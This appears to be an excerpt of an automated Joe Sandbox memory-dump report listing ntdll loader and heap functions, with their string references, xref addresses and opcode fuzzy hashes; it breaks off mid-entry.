MZER, xrefs: 055E16E8
Could not validate the crypto signature for DLL %wZ, xrefs: 0562A589
minkernel\ntdll\ldrmap.c, xrefs: 0562A59A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: 64e9de041a3fd1559da8bcb33c55c5ccb10e2d0e7a42c1cce48a05df1d75b55a
Instruction ID: 38bc806cb71556253e92c6669ce242812cf2a8dbb6f14217a460628b072f763c
Opcode Fuzzy Hash: 64e9de041a3fd1559da8bcb33c55c5ccb10e2d0e7a42c1cce48a05df1d75b55a
Instruction Fuzzy Hash: 92513771704F459BD725DB98C948F2A77E5FF01714F1809A9E9929BBD1C7B4E840CB40

Function 055E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0562A992
LdrpDynamicShimModule, xrefs: 0562A998
minkernel\ntdll\ldrinit.c, xrefs: 0562A9A2
apphelp.dll, xrefs: 055E2462

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 41ac66b4462f634bbb5c04e5e2f326e14b04529940daca99f352a9c1c8cee544
Instruction ID: 4d851e3a96327b603dfca80dde9daba87d2a5d5e5ade8e0420432f2f135beae1
Opcode Fuzzy Hash: 41ac66b4462f634bbb5c04e5e2f326e14b04529940daca99f352a9c1c8cee544
Instruction Fuzzy Hash: DA310772F20615ABEB24DF99D846E6E7BBAFB84700F150469F8016B740DAF05981CB90

Function 055B9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 0561BABA
HEAP: , xrefs: 0561BAAD, 0561BAEA
VirtualQuery Failed 0x%p %x, xrefs: 0561BAF7
HEAP[%wZ]: , xrefs: 0561BAA0, 0561BADD

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 90d83c5a7999390aefb75f94faf8c8f0ea41de18abb11e3bb3ed858583351ab2
Instruction ID: 754f74359156bf25296eab4fb885b85a5ae42732cbf2172b449b8c5cd4cd64bf
Opcode Fuzzy Hash: 90d83c5a7999390aefb75f94faf8c8f0ea41de18abb11e3bb3ed858583351ab2
Instruction Fuzzy Hash: 6D31B432600109EFEB01DB55C88DFEEB7B9FF45630F144055E915AB291DBB0E940DB64

Function 056694E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

0, xrefs: 05669BF6
, xrefs: 05669B84
, xrefs: 05669AD7

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: a8f735101c0bf6fb42d938a5a4faf779d40dcd7e1e350261a04a3c6f5528cce9
Instruction ID: b9d2fd878a5b6020cbab9798fc2869df5d49ba389abf3696d9b012ff3cc2fae8
Opcode Fuzzy Hash: a8f735101c0bf6fb42d938a5a4faf779d40dcd7e1e350261a04a3c6f5528cce9
Instruction Fuzzy Hash: 353202B16087818FD360CF68C484B6BBBE5BB88344F04492EF99A87350D775E949CB56

Function 055D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 056250CA
HEAP: , xrefs: 056250BD
HEAP[%wZ]: , xrefs: 056250AE

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 7bd2684e0c20afad7fdda1717d506710fc0088b955aef86813463c52d157a941
Instruction ID: 217aa621ecbbac471a4702035be60ed621e530a276d7aba35234790075e47c92
Opcode Fuzzy Hash: 7bd2684e0c20afad7fdda1717d506710fc0088b955aef86813463c52d157a941
Instruction Fuzzy Hash: 36F18A31B01605DFEB25CF68C898F7AB7B6FB44304F148668E4169B791E734A981CFA1

Function 055C1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 055C1728
HEAP: , xrefs: 055C1596
HEAP[%wZ]: , xrefs: 055C1712

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 6c9075d68526507983d4a041786d2c17d77241a4baeda3ed0846abb3b8e2e45c
Instruction ID: 09b551a7753759e3d071cdec4f7234a3263e8e2a47c08db12e08045b23d176a9
Opcode Fuzzy Hash: 6c9075d68526507983d4a041786d2c17d77241a4baeda3ed0846abb3b8e2e45c
Instruction Fuzzy Hash: 51E1D470A04A459FDB15CFA8C495BBABBF2FF44300F18889DE8968B746D734E941CB90

Function 055CB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 055CB714
MUI, xrefs: 055CB6D8, 055CB7E7
LdrResGetRCConfig Enter, xrefs: 055CB702

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 818f7517972897f979ea774a093d34cbf6de38b7eb6625cf55422eec01045a80
Instruction ID: 7b2ffd912861ec3002fd6d8622ebf6d21bbedce57d5329fecf35d36c7cedf641
Opcode Fuzzy Hash: 818f7517972897f979ea774a093d34cbf6de38b7eb6625cf55422eec01045a80
Instruction Fuzzy Hash: 22B17C31B08A559FCB25CF99C980BADBBB6BF44714F14496DE852EBB80D738A840CF51

Function 0564368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

@, xrefs: 0564389F
DelegatedNtdll, xrefs: 056436CE
\SystemRoot\system32\, xrefs: 05643842

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 612eff196792f65cdce8e14722df74d2e3d7e3b4fc9074fc3918f65b7f492b90
Instruction ID: d5ae3da025dcab78bfcddb1eb2f9a176f18d86b5952510bf11b5214cb6a81dbc
Opcode Fuzzy Hash: 612eff196792f65cdce8e14722df74d2e3d7e3b4fc9074fc3918f65b7f492b90
Instruction Fuzzy Hash: 8FB1AD72758346AFE721DE54C885F6BBBE8BB44714F000929FA419B790DB70E884CF96

Function 056536EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

@, xrefs: 05653867
LdrpResMapFile Exit, xrefs: 05653727
LdrpResMapFile Enter, xrefs: 05653715

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: e83e93c2d9f86383ec8af87adfd68964aab043c989cde005641378b9892b032f
Instruction ID: 25efd85f828a5386d5a5d805ea97bd564b5b7ce09f851c2f438d1b7c8cf6e1ce
Opcode Fuzzy Hash: e83e93c2d9f86383ec8af87adfd68964aab043c989cde005641378b9892b032f
Instruction Fuzzy Hash: 968178B5748341ABD325DF24C848B6AB7E9FF84BA0F04092DBD819B790E774D904CB66

Function 05647410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

Objects>%4u, xrefs: 056475D5
Objects=%4u, xrefs: 056475EA
VirtualAlloc, xrefs: 056475FC

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: d5c30efb48a8904c327b1772b748c226a466e3dc6c886c253c36287b5db3bfe2
Instruction ID: e4e21bae25aeebdac6ac5e50ba5c6af2f9831fd5b777b2bdd2568fe6f5726481
Opcode Fuzzy Hash: d5c30efb48a8904c327b1772b748c226a466e3dc6c886c253c36287b5db3bfe2
Instruction Fuzzy Hash: D2912CB0E002159FDB18CFA9C484BADBBF2FF48314F14816AD905AB791E7759842CF94

Function 055CB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

{, xrefs: 056237B6
LdrpResGetResourceDirectory Exit, xrefs: 055CB477
LdrpResGetResourceDirectory Enter, xrefs: 055CB465

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: da829cc7d34ceaaa237d40cf236ee9e774b13fd97ed2f7afa3ccf87046b0c705
Instruction ID: e59b8fb797a09b719e60796b979ce06d5ce0a60966cc18758aa3c687ea8dac3c
Opcode Fuzzy Hash: da829cc7d34ceaaa237d40cf236ee9e774b13fd97ed2f7afa3ccf87046b0c705
Instruction Fuzzy Hash: 1891CC71A08659CFDF21CF98C541BAEBBB2FF00324F544599E852AB390D7789A80CF94

Function 0569B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0569B82A
TargetNtPath, xrefs: 0569B82F
GlobalizationUserSettings, xrefs: 0569B834

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 124ede90e1a8fe72e3e0a77090ea02ffa6e967532cef916107097912e741ab06
Instruction ID: f6c8f724d8feafe522ca189da17d7de62054acb34084f6fa348e3552065094dd
Opcode Fuzzy Hash: 124ede90e1a8fe72e3e0a77090ea02ffa6e967532cef916107097912e741ab06
Instruction Fuzzy Hash: 0761BF32914629ABDF35DF54DC88BDAB7B8BF09710F0101E9E509AB260DB749E80CF90

Function 055BF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0561E6C6
HEAP: , xrefs: 0561E6B3
HEAP[%wZ]: , xrefs: 0561E6A6

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 78642ef1cd3cf6f03c6dcc8af80104a0fd4d86fc3f8e0fddd5040a674ad55988
Instruction ID: 04d9722ddbf666178ba9bc030f946f430b7b16ed5ffb1875c2658e8c942692c0
Opcode Fuzzy Hash: 78642ef1cd3cf6f03c6dcc8af80104a0fd4d86fc3f8e0fddd5040a674ad55988
Instruction Fuzzy Hash: 7451F731704645EFE722DBA8C848FA6BBF9FF45700F0844A4E9418B692D7B5ED80CB64

Function 055FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 056382DE
Failed to reallocate the system dirs string !, xrefs: 056382D7
minkernel\ntdll\ldrinit.c, xrefs: 056382E8

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 95ec24577f8ce7245424c36cd62a101972886587f96d19ba2e18d93171eb3ddd
Instruction ID: 0227076a70463fe1befb1633faf8ac50312dbc496cc7d0886e66569e2921f798
Opcode Fuzzy Hash: 95ec24577f8ce7245424c36cd62a101972886587f96d19ba2e18d93171eb3ddd
Instruction Fuzzy Hash: D841C672669309EBD720EB64D84AF5B7BE9FF84750F00492EBA45D7250EB70D840CB92

Function 055B758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0561AFB8
Invalid address specified to %s( %p, %p ), xrefs: 0561AFCB
HEAP[%wZ]: , xrefs: 0561AFAB

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 31765e5d34cbdabc22bca261fcc4be3cefd4861d8a115b2fd1d2751d3c115351
Instruction ID: e397dbcdc6a9eb11c4c258656d8786ae6c082813f88fa56d2167c98a6f346676
Opcode Fuzzy Hash: 31765e5d34cbdabc22bca261fcc4be3cefd4861d8a115b2fd1d2751d3c115351
Instruction Fuzzy Hash: 9D41E4703152408FFF29CE9DC088BB977A2FF89204F1C44A9D9468B746DAB4D885C795

Function 055F16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05631B39
minkernel\ntdll\ldrtls.c, xrefs: 05631B4A
LdrpAllocateTls, xrefs: 05631B40

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 4e8b7f99472249db1d51c98f9925e37f4303ee2a2cd1116dd38424e7591a3c66
Instruction ID: e144336a719ee9dcee1ed65e18775bb4ba61173818b64330b170ddcb3926d5ba
Opcode Fuzzy Hash: 4e8b7f99472249db1d51c98f9925e37f4303ee2a2cd1116dd38424e7591a3c66
Instruction Fuzzy Hash: CC419D75B01609EFDB15DFA8C842BAEBBF6FF88704F148519E406A7310EB75A800CB94

Function 05644755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 05644899
LdrpCheckRedirection, xrefs: 0564488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05644888

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: f5699c65303cc97fbb8b555d12ef853b621beae94acdaa427ea2263fdc7264f6
Instruction ID: db85f57b0cb7f0236145bfac78a382e512a3d6c26f41860ee536415cfaeb3ba7
Opcode Fuzzy Hash: f5699c65303cc97fbb8b555d12ef853b621beae94acdaa427ea2263fdc7264f6
Instruction Fuzzy Hash: 8C41DE32A146509FCF61CE68D842B677BE9FF49A92B050569EC49A7711EB30E801CF91

Function 05654144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 05654160
@, xrefs: 05654225
LdrpResValidateFilePath Exit, xrefs: 05654172

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 67edc51500300d80ae1346971f2730bbf0c1130f251916ab1b02b64fa608eebb
Instruction ID: 82cc0b035137c0d100fd415a86b2c151353845e7f297ef4ba7c2a3794cfbcac7
Opcode Fuzzy Hash: 67edc51500300d80ae1346971f2730bbf0c1130f251916ab1b02b64fa608eebb
Instruction Fuzzy Hash: 53411332A446588BEF35DB95C848BADB7B9FF85350F1404A9DC02EBB80DB358981CB21

Function 0564B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0564B632
@, xrefs: 0564B670
GlobalFlag, xrefs: 0564B68F

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 097196289bb39446bc812aa8ef0eadb29a4a3e182e6406c45df6eb20872999f3
Instruction ID: c014b436e938032b3e527ae9332b53a26b8af2449d9d1e6008f4fd6c8b71e078
Opcode Fuzzy Hash: 097196289bb39446bc812aa8ef0eadb29a4a3e182e6406c45df6eb20872999f3
Instruction Fuzzy Hash: A73118B1A00219AEDF11EFA4CC95AEFBBB9FF44744F140469E605A7250E774DA40CBA4

Function 055F1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

LdrpInitializeTls, xrefs: 05631A47
DLL "%wZ" has TLS information at %p, xrefs: 05631A40
minkernel\ntdll\ldrtls.c, xrefs: 05631A51

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: e957d916099267addac136ab6b0358b8791844b1a966fb9befb8c974f7a6cd2a
Instruction ID: a7c6bd6f59f48fc2d5de3c44e6eda6a6a887f2ba3476fa99c592727806d6fb9f
Opcode Fuzzy Hash: e957d916099267addac136ab6b0358b8791844b1a966fb9befb8c974f7a6cd2a
Instruction Fuzzy Hash: A531E732B10605EBE7119B58CC46FAA76BAFB94758F05052DF606AB580EBB0AD80C794

Function 0563E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0563E751
Legacy, xrefs: 0563E75A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: cf6b4b18dd0c49248e36d2e552406bae06b4362eb28bad478314c9a1f6879f1b
Instruction ID: 5f9dcedba0df40b24929627012392b97bf68605b0ecf7864211e8b4bec84cfee
Opcode Fuzzy Hash: cf6b4b18dd0c49248e36d2e552406bae06b4362eb28bad478314c9a1f6879f1b
Instruction Fuzzy Hash: 24615C72E046189FDB24DFA8C845BAEBBB9FF48700F14406DE549EB291D732AD01CB64

Function 055DF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 055DF860
$, xrefs: 055DF7F6

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: 4d4762e112b7a330306453aa0a57a0ef33630b876393d955f351fc9f4662fad7
Instruction ID: 073347340c1295a80b4e76f8c29b2a40a45d5a37d7769c34594c411fbf48093d
Opcode Fuzzy Hash: 4d4762e112b7a330306453aa0a57a0ef33630b876393d955f351fc9f4662fad7
Instruction Fuzzy Hash: F9619B72A0474ADFDB30DFA8C584BA9FBB2FF84704F144469D506AB640DB74A981CBA1

Function 055C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 055C063D
kLsE, xrefs: 055C0540

Memory Dump Source

